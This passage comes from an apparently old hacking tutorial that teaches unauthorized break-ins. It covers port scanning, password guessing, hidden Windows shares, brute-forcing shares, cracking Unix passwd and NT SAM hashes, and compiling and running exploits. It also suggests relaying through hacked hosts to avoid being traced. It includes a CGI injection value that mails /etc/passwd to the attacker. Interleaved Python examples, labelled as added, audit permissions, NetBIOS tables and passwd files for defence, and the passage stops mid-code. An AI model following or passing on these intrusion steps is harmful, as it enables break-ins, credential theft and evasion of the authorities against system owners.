hostnames if applicable. If you already know of two computers on different subnets, scan both. Now, write down each computer you
found and their IP addresses, along with any relevant notes. When you're done, you should have a list of each (or most) of the servers on
your target's network that are not behind a firewall/proxy server.
Step three. Now that you know what servers are on this network, you need to find out what services are running on each one. So what do
you do next? You guessed it - you'll scan for services, or ports, on each computer you found. Use your portscanner and scan each
computer you wrote down. Think of each service running on a machine as being like a door that you might be able to break in through. Below
I'll explain methods to use to possibly "break and enter" through each "door." Now, to get in, and have the power to actually do things
and explore the network, you'll need to telnet into one of the machines. This is usually the last step of hacking your way in, and you'll
need a username and password to do so (or an exploit, which will be explained shortly). You'll hack into other ports in order to get these
usernames and passwords. Now, a username and password that works on one machine of the network will usually work on all on that
same network, so if you get passwords from one computer, you can use them on a different one to get in. Also, if there are no telnet ports,
you can still (sometimes) log in via FTP. You won't be able to do much (like run any programs on the computer), but you will be able to
look around and upload or download files from the computer. This all, of course, is assuming the computer is a Unix machine, which
most computers on the Internet are. You may come across a Windows NT machine, which is entirely different. This means to become
elite, you'll have to learn both operating systems.
Unix
The vast majority of the computers you'll come across on the Internet will be some flavor of Unix, be it BSD, Solaris, AIX, Linux, or
whatever. Unix systems are set up to be multiuser. There will be a Unix box with lots of dumb terminals (monitors and keyboards with
no boxes of their own) directly hardwired into it. Each person who is authorized to be on a dumb terminal (or access the box via telnet)
has an account on that system, and probably on each machine on that subnet. Their account has its own directory (folder), which has the
same name as their username. As soon as they log in, they will be placed in that directory, their home directory. Every file and directory in a
user's home directory belongs to that user, be it a text file, program, or whatever. Also, every user belongs to a group. This is important,
because it is fundamental to how permissions work. Not every user is allowed to read every file on the computer, change every file, and
run every program. To list the files in your pwd (present working directory, the "folder" you're currently in) type 'ls' (without the
quotation marks). This is equivalent to the 'dir' command in DOS. To see the permissions of the files in your pwd, type 'ls -l'. This will tell you
the permissions of each file, including who owns it, and what group that user belongs to. Permission categories are set for read
permission (the ability to read the file), write (the ability to make changes to the file), and execute (the ability to run the program). Each
category is set for the owner of that file (user), everyone in that user's group (group), and then for everyone else on the system (other).
When you issue an ls -l, each file will be listed with a ten character string. The first character will be a dash (-) if it's a regular file, a 'd' if it's a
directory, or an 'l' if it's a symbolic link (kind of like a Windows shortcut). Other less common letters may appear, which I won't cover. The
next nine characters are broken up into three sets of three. The first three apply to 'user,' or the owner of that file. Each of the three
characters represents either an r for read, a w for write, or an x for execute. If they have permission to read, write, or execute that file, the
corresponding letter will appear; if not, a dash will. The next set of three characters applies to the file owner's group, with r, w, and x in the
same manner. And the last set of three is for 'other,' meaning the permissions (r, w, and x) for everyone else on that system. So a
permissions string of -rwxr--r-- means that it's a regular file (not a directory or link), that the owner of that file can read it, make changes to
it, and execute it. Also, we see that the group that the user belongs to can also read the file (but not change or execute it), and that
everyone else can read it but nothing else.
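The ten-character string decoded in code. This is an added example, not from the original text: parse_mode() turns an 'ls -l' mode string into the user/group/other rwx sets the text describes and the equivalent octal mode, and review_listing() runs it over a whole listing to flag the two things an administrator reading one would want to notice first, world-writable entries and setuid/setgid programs. It also handles the "less common letters" the text skips: an 's' in the user or group execute slot is setuid/setgid, a 't' in the other slot is the sticky bit, and a capital S or T means that bit is set without the execute bit. Function names and the sample listing are constructed.

```python
# Added example (not from the original text): decoding the ten-character
# mode string that 'ls -l' prints, as described above, and flagging the
# settings an administrator reviewing a listing would want to notice.
# The sample listing at the bottom is constructed, not from a real host.

FILE_TYPES = {"-": "file", "d": "directory", "l": "symlink"}


def parse_mode(mode):
    """Decode an ls -l mode string such as '-rwxr--r--'.

    Returns the file type, one rwx set each for user, group and other,
    the octal value of those nine bits, and the special bits (setuid,
    setgid, sticky) that show up as 's'/'S' or 't'/'T' in the execute slots.
    """
    if len(mode) != 10:
        raise ValueError(f"mode string must be 10 characters: {mode!r}")
    ftype = FILE_TYPES.get(mode[0], "other")
    perms = {}
    octal = 0
    special = {"setuid": False, "setgid": False, "sticky": False}
    for idx, who in enumerate(("user", "group", "other")):
        triple = mode[1 + 3 * idx: 4 + 3 * idx]
        r = triple[0] == "r"
        w = triple[1] == "w"
        x_char = triple[2]
        x = x_char in "xst"          # lowercase s/t include the execute bit
        if x_char in "sS":
            special["setuid" if who == "user" else "setgid"] = True
        elif x_char in "tT":
            special["sticky"] = True
        perms[who] = {"read": r, "write": w, "execute": x}
        octal = octal * 8 + (4 if r else 0) + (2 if w else 0) + (1 if x else 0)
    return {"type": ftype, "perms": perms, "octal": f"{octal:03o}", "special": special}


def review_listing(lines):
    """Run parse_mode over 'ls -l' output and return (name, reason) pairs
    for entries worth a second look: world-writable files or directories
    and anything carrying setuid/setgid. Symlinks always show rwxrwxrwx,
    so they are not reported as world-writable."""
    findings = []
    for line in lines:
        fields = line.split()
        if len(fields) < 9:
            continue                 # 'total 12' and the like, not a file entry
        mode, name = fields[0], fields[8]
        info = parse_mode(mode)
        if info["perms"]["other"]["write"] and info["type"] != "symlink":
            findings.append((name, "world-writable"))
        if info["special"]["setuid"] or info["special"]["setgid"]:
            findings.append((name, "setuid/setgid"))
    return findings


SAMPLE_LISTING = [               # constructed sample, not a real system
    "total 12",
    "-rwxr--r--  1 alice users  1024 Mar  3 10:00 notes.txt",
    "drwxrwxrwx  2 alice users  4096 Mar  3 10:00 dropbox",
    "-rwsr-xr-x  1 root  root  22000 Mar  3 10:00 passwd",
    "lrwxrwxrwx  1 root  root      8 Mar  3 10:00 sh -> /bin/bash",
]

if __name__ == "__main__":
    print(parse_mode("-rwxr--r--"))
    for name, reason in review_listing(SAMPLE_LISTING):
        print(f"{name}: {reason}")
```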
Unix is set up much like DOS, in that there are directories with subdirectories, and a root directory. Instead of C:\tools\ftp you would see
/tools/ftp. The slashes are forward instead of back, and there is no drive letter - root is simply /.
Oftentimes, if you find a Unix machine on the Internet, it is connected to a variety of other computers. What's more exciting is that the
Unix machine you just broke into may be directly connected to another, more secret Unix computer that was behind a firewall (meaning
that you normally wouldn't be able to just telnet to it from your home computer, and it probably didn't show up on a subnet scan). If you
telnet from your hacked Unix account to another Unix machine, your source IP address becomes that of the Unix machine you are on (this
is often done to deter authorities from tracing a hack). So let's pretend you run a subnet scan on your target network, looking for a
computer called secret.network.com. Among others, you find comp1.network.com, comp2.network.com, and comp3.network.com. But
no computer named secret. And if you try to telnet to secret.network.com, your connection lasts only a split second. Firewall. After a
few hours of plugging away, you get a rootshell on comp2. You then telnet from comp2 to secret, and are presented with a logon prompt.
Why can you now connect to secret? Because your IP address is now comp2's, meaning secret is set up to allow connections only from
computers on its own network - and it thinks you are comp2. For a list of connected Unix machines, look at /etc/hosts.
When you first log into a machine with a username and password you 'hacked,' find out what group that account belongs to, and get a feel
for what kinds of stuff you have access to, and what you don't. If you find yourself with just about zero access to anything fun, you'll have
to use the account you have to obtain one with more privileges. For more info on Unix, get a Unix book, or read the Unix Bible text file
(available at The CyberUnderground). This is one operating system that you will need to know, and well, if you plan on becoming eleet.
For some basic Unix commands, look at Appendix B at the end of this text.
NT
Until recently, UNIX machines made up the vast majority of machines on the Internet. Windows NT has eaten up some of that percentage.
Now, somewhere between 10% and 15% of machines you'll find on the Net are NT boxes. NT machines ship with and are compatible with
almost as many services as UNIX, with a few differences. Generally, you won't find as many open ports on a Windows box because they
don't use raw sockets like the various flavors of Unix (a socket is a two-way connection between two computers, using any protocol). NT
Server ships with an FTP server (IIS). Finger servers can also be purchased for NT machines. SMTP and POP (Post Office Protocol)
servers come with Microsoft Exchange, which is pretty commonplace. One port that will give your target away as a Windows box is an
open port 139. This is the port for NBT, or 'nbsession' according to some portscanners. Unix machines use strictly TCP/IP for
communications (making them ideal machines for the Internet), whereas NT uses NetBIOS (NetBIOS does not work over the Internet, so
NT Servers must utilize NetBIOS over TCP/IP in order to do so), or what they call NetBEUI (NetBIOS Extended User Interface). To
connect to an NT machine, you must use Microsoft Client. Using MS Client to connect to a NetBIOS port on a Windows machine is
similar in nature to telnetting to port 23 on a UNIX machine. If you have Windows 95 / 98 / NT, you have Microsoft Client. It might not
be installed though. To check, go to Control Panel, then Network. You should then see a list of protocols you have installed on your
machine. In order to use MS Client, you need NetBEUI, Client for Microsoft Networks, and (of course) TCP/IP. If you are missing any
of these, click on 'Add' and add the appropriate client or protocol (you'll probably need Windows disks). To use MS Client, open a DOS
box. The command you will be using is 'net.'
Type 'net' to see a list of Net commands. Some of these cannot be issued from a DOS window. The two you as a hacker should be
concerned with are 'net view' and 'net use'. If ever you come across a machine with an open port 139, there is a chance that the machine
has open shares on it. A Windows share is a directory somewhere on the server (be it Windows 95, 98, or NT) that is set up to be accessed
by others in the network. Sometimes they are password protected, sometimes not. Once connected to a share, you can use regular DOS
commands (cd, mkdir, edit, etc.) to move about and manipulate files within it. To look for shares on an NT box with NetBIOS, at a DOS
prompt type:
net view \\[ip address]
Again, this will only work if you have NetBEUI, TCP/IP, and Client for Microsoft Networks installed on your computer. If there are any
open shares, they will be listed by name after you issue this command. So let's say you net view some.server.net, and are told that there is
a share called 'users'. To connect to it, type:
net use [d]: \\[ip address]\[sharename]
or in this case...
net use w: \\some.server.net\users
where w: is the drive letter you are mapping the share to. If you get a 'The command completed successfully' then you are connected to
the share. Change drives to w: (or whatever drive letter you picked) and hit 'dir.' Now, let's say that the share 'users' was
'C:\network\users' on the NT box. Your drive w: is now C:\network\users, though you can't go any higher up the filesystem than where
you start. Unlike UNIX, you won't be able to issue a command to see what permissions you have - so you'll just have to try it out. Create
and erase a file. Make and delete a directory. You could have only read permissions, or you may have read and write (read files and
modify them). If you see a file you want a copy of, do something like this:
type fileIwant.txt > C:\mybox\fileIwant.txt
And it will copy over to your machine. If ever you come across a passworded share, you have a few options on how to get past the
protection. You could get the password hashes and crack them with L0phtCrack (explained later). Or, you could write a batch file that
connects to the share, then spits passwords from a wordlist (available all over). If you aren't skilled at writing batch files, get yourself a
good DOS book, and at least find out about commands and DOS environment variables. You could make yourself quite a powerful brute
force share-cracker batch file in under 20 lines. I personally use VB for brute force engine making. Also, if you want to quickly search an
entire (or even multiple) subnet(s) for open shares, use a sharescanner such as Legion.
One last thing on shares - oftentimes Administrators hide certain shares. This means that it won't show up on a Net View. But if you
connect to it (Net Use) by name, you will be granted access. Below is a list of common hidden shares:
ADMIN$ (remote administration - can you say rootshell?)
IPC$ (these are really fun...)
SMB$ (samba server)
SMBSERVER$
The dollar sign at the end is what makes it a hidden share. You must include it in your Net Use command. One last note on NT hacking.
The WINS (Windows Internet Naming Service) protocol is responsible for translating NetBEUI names (NetBIOS uses computer names
instead of addresses) to IP addresses. To look at the WINS configuration of any computer, use the nbtstat command. Furthermore, the
file lmhosts.sam on any Windows machine will act as a mini WINS table if WINS itself is disabled (TCP/IP properties under Control
Panel/Network). What does this mean to you as a hacker? Let's say the NT computer you are trying to break into is 200.23.54.1. Do an
nbtstat -A 200.23.54.1 to get its NetBEUI over TCP/IP info. Of importance is any entry with a <20> hex value - this means the computer
is sharing (and that you can connect via the NET command, or with the technique I'm about to explain). A <00> means that this is the
computer's name. So to connect to the computer, add it to your lmhosts.sam file. The entry would look something like:
200.23.54.1 compname #pre
Then, reload your NBT cache by issuing a nbtstat -R
Your computer now knows how to directly 'NetBEUI into' that machine. Go to Find on your start menu, then Computers, and type in the
computer name. If you did everything correctly and have your network configuration correct (see above for instructions on how to do it),
that computer will pop up. To connect, just double click on it. I suggest copying a shortcut to your desktop, or your Network
Neighborhood.
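Reading the nbtstat name table in code, the way an administrator checking what a host advertises on port 139 would. This is an added example, not from the original text: parse_nbtstat() pulls the rows out of 'nbtstat -A' output, summarize_host() picks out the two entries the text says matter (the UNIQUE <00> row is the machine's own name, a <20> row means the file-server service is registered, i.e. the host is offering shares at all), and is_hidden_share() applies the trailing '$' rule from the list above. The sample output is constructed to match the nbtstat table layout; the MAC address in it is a placeholder.

```python
# Added example (not from the original text): reading the table that
# 'nbtstat -A <ip>' prints and picking out the <00> computer name and
# the <20> file-server service entry the text describes, plus the
# trailing-'$' rule for hidden shares. Sample output is constructed.
import re

# one table row: NAME <hh> UNIQUE|GROUP Status
NBT_ROW = re.compile(r"^\s*(\S+)\s+<([0-9A-Fa-f]{2})>\s+(UNIQUE|GROUP)\s+(\S+)")

SAMPLE_NBTSTAT = """\
       NetBIOS Remote Machine Name Table

   Name               Type         Status
---------------------------------------------
COMPNAME       <00>  UNIQUE      Registered
COMPNAME       <20>  UNIQUE      Registered
WORKGROUP      <00>  GROUP       Registered
WORKGROUP      <1E>  GROUP       Registered

MAC Address = 00-00-00-00-00-00
"""


def parse_nbtstat(text):
    """Return (name, suffix, kind) tuples for every table row in the output;
    header lines and the MAC line do not match the row pattern and are skipped."""
    rows = []
    for line in text.splitlines():
        m = NBT_ROW.match(line)
        if m:
            rows.append((m.group(1), m.group(2).upper(), m.group(3)))
    return rows


def summarize_host(text):
    """What the text says to look for: the machine's own name (UNIQUE <00>)
    and whether the file-server service (<20>) is registered, which is what
    makes the host reachable for 'net view' / 'net use' in the first place."""
    rows = parse_nbtstat(text)
    name = next((n for n, suf, kind in rows if suf == "00" and kind == "UNIQUE"), None)
    sharing = any(suf == "20" for _, suf, _ in rows)
    return {"computer_name": name, "file_sharing": sharing}


def is_hidden_share(share_name):
    """A share whose name ends in '$' is not listed by 'net view',
    though it can still be connected to by name."""
    return share_name.endswith("$")


if __name__ == "__main__":
    print(summarize_host(SAMPLE_NBTSTAT))
    for share in ("users", "ADMIN$", "IPC$"):
        print(share, "hidden" if is_hidden_share(share) else "listed")
```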
Novell Netware
Unix machines still claim most machines on the Net. NT is catching up, and between the POSIX and Microsoft platforms, you won't find
much else on the Internet. Once in a great while, however, you just might run into a completely different operating system. Novell
Netware used to be the biggest Client/Server Network Operating System around, and rivals NT to this day. So just in case you run into
one of these foreign systems, here is a little info on Novell Netware.
Netware has been around for quite some time - the first version was command-line and sat on top of DOS. Now GUI (Graphical User
Interface) clients exist for it, and version 4.5 has been released. Like Windows NT, computing is not centralized (as it is with Unix), and
resources are distributed among the network. One computer may be a print server, one might be a mail server, another a file server. The
thing that makes Netware unique is what's called the NDS database, or Novell Directory Services. The NDS is comparable to an NT
network's PDC's registry. It is a hierarchical representation of the entire network. At the root of the NDS tree is the object 'root,' similar
to a root directory. Stemming from the root object are one or more 'organizational' objects, comparable to subdirectories. Inside these
objects can be more organizational objects, or what are known as 'leaf' objects, comparable to files. These leaf objects are what make up
the conceptual network. Leaves include user objects, representing users of the network, server objects, representing servers, and so on.
The organizational units exist for no other reason than to conceptually organize the network. The whole idea of an NDS is sometimes hard to
grasp at first, due to its being so abstract, but greatly eases administration.
When you refer to a specific file on a hard disk, you refer to its path. When you refer to an NDS object's location, you refer to its context.
Paths start with root at the left, such as:
C:\Winnt\programs\file.ini
Contexts, on the other hand, start with the root at the right, such as:
.user22.market.UAS
where user22 is the object we are referring to. We don't need to specify root because it's assumed that root is always after the last
organizational unit listed. The context above specifies the user22 object, which is in the organizational unit 'market,' which resides in the
organization 'UAS.' When referring to objects absolutely (full context), you must start the context with a period (.), and separate each
entry with a period also. Now if your current working context was .market.UAS (same concept as a current working directory), you could
refer to user22 relatively (just as in Unix or DOS filesystems) with simply:
user22
with no period.
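The context rules above, worked through in code. This is an added example, not from the original text: parse_context() splits a context into its components (innermost object first, since the root is on the right), resolve() turns a relative name into a full context by appending the current working context, the same way a relative path is joined to a current directory, and container_of() gives the object's parent container. The object names are the text's own plus constructed ones; the function names are assumptions, as is the "[Root]" label returned for the top of the tree.

```python
# Added example (not from the original text): resolving NDS contexts as
# described above. A leading period marks an absolute context, read
# right-to-left from the root; a name without one is relative to the
# current context. Object names are constructed for illustration.


def parse_context(context):
    """Split a context into (is_absolute, [components]), innermost object first.

    '.user22.market.UAS' -> (True, ['user22', 'market', 'UAS'])
    'user22'             -> (False, ['user22'])
    Empty components (a doubled period) are rejected as malformed.
    """
    if not context or context == ".":
        raise ValueError("empty context")
    is_absolute = context.startswith(".")
    body = context[1:] if is_absolute else context
    raw = body.split(".")
    parts = [p for p in raw if p]
    if not parts or len(parts) != len(raw):
        raise ValueError(f"malformed context: {context!r}")
    return is_absolute, parts


def resolve(name, current_context):
    """Return the absolute context of `name` given the current working context.

    Absolute names are returned unchanged. Relative names get the current
    context appended on the right, just as a relative path is joined onto
    the current directory; the current context itself must be absolute.
    """
    is_abs, parts = parse_context(name)
    if is_abs:
        return "." + ".".join(parts)
    cur_abs, cur_parts = parse_context(current_context)
    if not cur_abs:
        raise ValueError("current context must be absolute")
    return "." + ".".join(parts + cur_parts)


def container_of(context):
    """The container holding an object: everything right of the leftmost
    component. An object directly under the root reports '[Root]'
    (label assumed here for the root object the text describes)."""
    _, parts = parse_context(context)
    if len(parts) == 1:
        return "[Root]"
    return "." + ".".join(parts[1:])


if __name__ == "__main__":
    print(resolve("user22", ".market.UAS"))        # .user22.market.UAS
    print(container_of(".user22.market.UAS"))      # .market.UAS
```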
Now, Netware networks usually use GUI interfaces. If you ever connect to a Novell server over the Net, you will have to navigate it
from the command line, though. You map network drives to Netware volumes (similar to a Windows share) as you would to an NT machine, with
the MAP command. You would change your context and navigate the NDS with the CX command. In order to do this, you will need to
get your hands on a Netware client. You can get a free command-line client at www.novell.com.
Now each user in a Novell network is represented by a user leaf object on the NDS tree. So to log in as user22, whose object is in the
marketing.UAS container, you have to log in as:
.user22.marketing.UAS
Mapping drives to Netware volumes is done in one of two ways. You can either specify the server name you are connecting to physically,
such as:
map x: servername/volumename
or by its NDS object, such as
map x: server_nds_object:volumename
When trying to break into a Novell server on the net, with say, an IP address of 212.14.6.2, you would issue this command (with a Novell
client in a DOS box):
map x: 212.14.6.2/volumename
It is beyond the scope of this text to get into great detail about all the commands and inner workings of Netware, so feel free to jump into a
Netware book. Really.
"Unbelievable - a Hacker!"
The object of your hack will most likely be to obtain root, ie: total control over the network. With a rootshell (any shell with root
privileges, such as the superuser account) you can read, write, and execute everything on the network (or at least that particular
computer). To obtain root, you'll probably have to break in with some other account first. From there you can run a local exploit,
download the password file, or whatever.
Sploits
A local sploit (exploit) is a program that exploits some security bug inherent in the operating system, and will greatly increase your access
levels, oftentimes to root. There are many exploits out there, for many different network operating systems. One of the most common of
these is the Buffer Overflow (also known as a Stack Overflow). This is a technique in which, when run, the OS's buffer (a container of
memory set aside by the OS for data it's working with) is filled with garbage. When the buffer is "filled," the last string on the stack can
be executed, to do such things as initiate a root shell. To use any exploit, of course, you need to have an account that you can log into FTP
with and upload the exploit from your computer to the server you want to run it on. You then need to log in via telnet and run it. Exploits
are OS and version specific, and it's sometimes hard to find one for a specific one (they are usually available all over the Internet). If this
is the case, you'll have to resort to more traditional methods of getting root. Like cracking the password file.
The Password File
In the /etc directory (UNIX) is a file called passwd, which holds every password for every user, along with some other information.
Unfortunately for you, the passwords are encrypted. This means you'll have to download the password file and crack it on your own
computer. You'll use a password cracker such as John the Ripper for this. Another security feature system administrators will use to keep
hackers out is password shadowing. If shadowing is done (and oftentimes it is), all the encrypted passwords will be replaced with *'s or x's.
These are not crackable. The real password hashes (encrypted passwords) are most likely in a different file, such as /etc/master.passwd
or /etc/shadow. Look around. To give you an idea of what to look for, here is an encrypted password file:
root:2fkbNba29uWys:0:1:Operator:/:/bin/csh
admin:rYsKMjnvRppro:100:11:WWW administrator:/home/Common/WWW:/bin/csh
kangaroo:3A62i9qr:1012:10:Hisaharu
Here is a shadowed password file:
root:*:0:1:Operator:/:/bin/csh
admin:*:100:11:WWW administrator:/home/Common/WWW:/bin/csh
kangaroo:*:1012:10:Hisaharu TANAKA:/home/user/kangaroo:/usr/local/bin/tcsh
At any rate, when you crack these, depending on the encryption strength and passwords used, you should get a handful of valid
usernames and passwords. If you didn't get the root password, you could also use one that belongs to the same group as root (such as
admin or sysop). One note about root: a lot of systems are set up so that root cannot log in remotely (from outside). This means you'll
have to log in as someone else, then use the 'su' command and enter the root password (su is used by system administrators to jump
around from account to account, and stands for 'substitute user.')
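The seven-field passwd format shown above, parsed and audited the way an administrator checking their own system would. This is an added example, not from the original text: parse_passwd_line() splits one entry, classify_password_field() tells a placeholder ('*', 'x' and the other shadow markers) from an empty field and from a real hash, and audit_passwd() reports per account what matters: a hash still sitting in the world-readable passwd file instead of the shadow file, an account with no password at all, and any account with UID 0. The sample lines are the page's own examples plus constructed ones, including a truncated line so the malformed-entry path is exercised; function names are assumptions.

```python
# Added example (not from the original text): parsing /etc/passwd in the
# seven-field format shown above and reporting what an audit of the file
# should surface. Sample entries are the page's examples plus constructed
# lines, marked as such.

# Placeholders that mean "the real hash lives in the shadow file" (or that
# the account is locked). Not every system uses every marker.
SHADOW_MARKERS = {"*", "x", "!", "!!", "*LK*", "*NP*"}


def parse_passwd_line(line):
    """Split one passwd entry into its seven fields; raise on a malformed line."""
    fields = line.rstrip("\n").split(":")
    if len(fields) != 7:
        raise ValueError(f"expected 7 colon-separated fields, got {len(fields)}: {line!r}")
    user, pw, uid, gid, gecos, home, shell = fields
    return {
        "user": user, "password": pw, "uid": int(uid), "gid": int(gid),
        "gecos": gecos, "home": home, "shell": shell,
    }


def classify_password_field(pw):
    """'shadowed' for a placeholder, 'empty' when no password is needed to
    log in, otherwise 'hash' (a real hash exposed in the passwd file)."""
    if pw == "":
        return "empty"
    if pw in SHADOW_MARKERS:
        return "shadowed"
    return "hash"


def audit_passwd(lines):
    """Return {username: [findings]}. A malformed line is reported under
    whatever name precedes its first colon instead of aborting the run."""
    findings = {}
    for line in lines:
        if not line.strip() or line.startswith("#"):
            continue
        try:
            entry = parse_passwd_line(line)
        except ValueError as exc:
            findings[line.split(":")[0]] = ["malformed: " + str(exc)]
            continue
        notes = []
        kind = classify_password_field(entry["password"])
        if kind == "hash":
            notes.append("hash exposed in passwd (not shadowed)")
        elif kind == "empty":
            notes.append("no password set")
        if entry["uid"] == 0:
            notes.append("uid 0 (superuser)")
        findings[entry["user"]] = notes
    return findings


SAMPLE_PASSWD = [
    # the page's own example entries
    "root:2fkbNba29uWys:0:1:Operator:/:/bin/csh",
    "admin:rYsKMjnvRppro:100:11:WWW administrator:/home/Common/WWW:/bin/csh",
    "kangaroo:*:1012:10:Hisaharu TANAKA:/home/user/kangaroo:/usr/local/bin/tcsh",
    # constructed entries
    "guest::2000:2000:Guest account:/home/guest:/bin/sh",
    "toor:x:0:0:backup root:/root:/bin/sh",
    "broken:3A62i9qr:1012:10:Hisaharu",          # constructed truncated line
]

if __name__ == "__main__":
    for user, notes in audit_passwd(SAMPLE_PASSWD).items():
        print(f"{user}: {', '.join(notes) or 'ok'}")
```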
NT passwords are a little different. They are kept in the registry, not just a file like Unix, which makes them harder to get your hands on.
They are encrypted as well. There are a few ways to get them. Since most of the registry is held in memory while the computer runs, you
can do a core dump, or more specifically, a registry dump. You'll need L0phtCrack to do this, and Windows NT (so now might be a good
idea to put an NT partition on your hard drive). If you are physically near the NT box you want to hack, just install L0phtCrack and select
the Registry Dump option. Otherwise, you have two options for getting the password hashes (encrypted passwords) over the Internet. If the
NT machine allows for remote registry sharing (not common), and you have NT at home, you can extract the passwords from your target's
registry with L0phtCrack. Just enter your target's IP address, and in a few seconds you'll find out if it allows for RRS or not. If not, you
have only one option left. Windows NT registries are made up of Hives. Each hive is stored in a *._ file. The hive with the passwords in
it is SAM._. So why don't you just download it like a UNIX password file? Because NT is set up not to let anyone see, copy, or modify
the SAM hive. Your only hope is to boot your target machine into an alternative OS, like Linux or DOS, then get the file (NT protects the
file; DOS and Linux don't). This is difficult over the net. It is, however, possible. Also, you'll need a program that will allow DOS
(which uses the FAT filesystem) or Linux (which uses the EXT2 filesystem) to access the partition that SAM._ is on (which is in an NTFS
filesystem partition). Once in a while, though, you may come across copies of the hives (all with ._ extensions) stored in a directory like
'repair' or 'reg_backup'. With all the work that it takes to get NT passwords, you're usually better off trying some other method of getting
in, like exploits.
Infiltration
Again, every open port (port that you found during your portscan) is a door to the insides of that computer. To find out how each port is a
potential point of infiltration for you, you'll need to find out a little more about each protocol. Do some research. For now, I've provided
a little info on how you can use these protocols against the computer.
Again, when you log in via a telnet port, it is as if you are directly connected to and part of that network. One of the first things you should
try is the "front door." Telnet to the machine, and try some commonly used username and password combinations. Next, try each of the
email addresses you've collected. About one in twenty people are dumb enough to use their first name or login name as their password
(assuming they are allowed to set their own password), so try that too. Chances are this won't work (though it's a good idea to try
anyway), so you can move on to hacking in through various ports.
Oftentimes the FTP service allows for anonymous logins (logging in with 'ftp' as a username and no password). When you do so, your
home directory will be something like /usr/daemon/ftp or /home/ftp. However, if you issue a pwd (to find what directory you're currently
in), it will say that your pwd is / (root). This means that you are in a restricted shell. So if after logging in anonymously you cd (change
directory) to lib, you will be told that you are in /lib, while you'll really be in /home/ftp/lib, or whatever. System admins like to put /bin's
and /etc's in the ftp directory, and in the /etc will be a password file - but don't get your hopes up - 99% of the time it's shadowed.
Anonymous ftp access is really only helpful if you can download useful information.
If you see an open finger port, this could be the break you were looking for. Use a finger client and do a generic query (no usernames) to
possibly get a list of users logged on. Next try putting an @ symbol in front of the domain you are querying, for a list of all users, logged
on or not. For specific user information, type in username@domain.
If you see a port called 'nbsession' open, you may also be in luck. This usually means that this particular server is an NT box (much less
commonly used than Unix). Refer to the NT section.
The rlogin port may be another point of infiltration. This is kind of like telnet, though older and not as secure. Telnet to it and see what
you can do.
The Gopher protocol was used as a text transfer protocol before the days of HTML, the WWW, and graphics on the web. If you come
across a gopher port, use a browser with a built in gopher client (newer versions of Navigator and MIE) and connect to it. You'd be
amazed as to what the gopher service will sometimes let you see.
Write down any other ports you see. Telnet to them all, and see what happens. If after you telnet in nothing happens, issue commands, hit
enter a few times. Play around - as I said before, 80% of what you will know will come from experience, not texts.
Remote Sploits
Another way to use the FTP and SMTP ports against the server is with a remote exploit. Local exploits are those that you execute on the
server, whereas remote exploits you launch from your computer. Both can be found on various sploit archives on the Net. Remote, as
with local exploits, are service and version specific, in that they exploit a security bug inherent in the programming of the service itself. If
the FTP port has the service wu-ftp ver 2.2.4, go out and find the exploit for that exact service of that exact version. If the SMTP port is
running sendmail 8.8.8, get the sploit for it. These exploits will be in the form of C code (usually), so you'll need to compile them. Most
assume that you have specific header files (*.h), so you may need to find those as well - look at the code to be sure. To make obtaining
the header files and compiling the exploits a heck of a lot easier, you ought to think about putting a Linux partition on your hard drive. At
any rate, most remote exploits, if correctly implemented, when launched give you root access, or at least access. To find out what service
an FTP port is running, telnet to it, it might just tell you. If not, use the SYST command, and then you'll be told. You may have to log in
to do so - try doing so anonymously. As far as SMTP, it hides its service software and version much less often than FTP does.
Eleet Hacker Tactics
Up to this point, you've learned the basics of various NOS's, and how the Internet works. "When will we get to the core hacking stuff?"
You have been - breaking into a system is nothing more than understanding it thoroughly, knowing the 'rules', what you can and can't do.
Hacking is taking what you know, and using that to circumvent usually half-hearted attempts to keep casual onlookers from being where
they aren't supposed to be. Your most powerful weapon is a broad knowledge of computers and networks, and thorough knowledge of
your target. Meaning go get yourself a Unix book. Well, now that you know the basics of hacking, I'll go into some more advanced
tactics you can employ to gain access to computers on the Internet.
Service Exploitation
One of the first things you should do when you target a particular machine is telnet to every port and find out what services are running.
Find out what FTP service, and what POP and SMTP daemons, are running (when you telnet to the appropriate port, it will usually tell you).
Then go to sploit archives like www.securityfocus.com and www.rootshell.com, and subscribe to BugTraq and NT BugTraq. Look up every
service/daemon you find, as well as the operating system. Most exploits are in C, so you'll need to put a Linux partition on your hard
drive to get them to compile and run. If you have problems compiling the sploits, brush up on your UNIX C utilities. Look in the manpages
for cc, gcc, and make (if there is a makefile, which makes compiling the sploits lots easier).
CGI Exploitation
CGI (Common Gateway Interface) is a method used to make web pages more interactive. For example: you visit your account at
Hotmail. You type your username and password into the text boxes, and click 'enter.' The Hotmail computer then reads what you typed,
and runs a script (which could be in a variety of programming or scripting languages) that logs you into your account. That's CGI.
Any time you interface with the website (such as search engines) you are using CGI. CGI adds lots of functionality, and lots of security
issues. There are currently all kinds of known CGI exploitations. Two old ones are http://www.someserver.com/cgi-bin/phf and
http://www.someserver.com/cgi-bin/finger. If the file in question (/cgi-bin/finger) exists, and you request it, you will get a box up. In the
box, type:
root ; mail you@youremail.address < /etc/passwd
What this does when the computer runs the script is issue the command:
finger (whatever you type in the box). The ; operator starts a new command, which in this case is mailing the password file to you.
Copy it, paste it into a text file, and crack it. To find CGI exploits, get a CGI exploit scanner (such as WebChk, available at The
CyberUnderground) or use one on a web site such as CyberArmy.com or infinityzone.cjb.net.
Another problem with CGI is that webservers that are CGI enabled have special 'CGI executable directories'. These include /cgi-bin/
(Unix), /cgi-win/, and /cgi-dos/ (Windows machines). The HTTP daemon knows to execute any file requested in those directories.
Normally, when you type www.someserver.com/index.html, all that is happening is the daemon sends you a copy of index.html. If you
type www.someserver.com/cgi-bin/program, the daemon will actually run program, if it exists. The output of this process is usually
exported to HTML format and sent to your computer. You as a hacker could exploit this, though, by running programs of your own on
the remote machine (if, say, you had FTP access but not telnet). Great for spawning exploits.
In order to find out whether or not a particular web server is vulnerable (ie: has a CGI file somewhere on it that can be used to gain access),
you can do a number of things. Download WebChk to scan for you. Go to a website such as infinityzone.cjb.net and use their built-in
CGI scanner. Or, for best results, obtain a list of vulnerable CGI files/servers and use a browser to scan for them manually. Doing
things yourself, rather than using canned hacker tools, always provides better results along with expanding your own knowledge.
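The ; trick above works because the form value is handed straight to a shell. As an added example (mine, not code from the original text or from WebChk), here is that unsafe pattern next to an input-validated version that never touches a shell; the USER_RE allowlist and the function names are my own.

```python
import re
import shlex

# Allowlist for a login name. The first character cannot be '-', so a value
# that passes can never be read as a finger option either.
USER_RE = re.compile(r"[a-z_][a-z0-9_-]{0,31}")


def vulnerable_command(form_value: str) -> str:
    """The pattern the text describes: the form field is pasted straight into a
    shell command line. Returned as a string for inspection, never executed."""
    return "finger " + form_value


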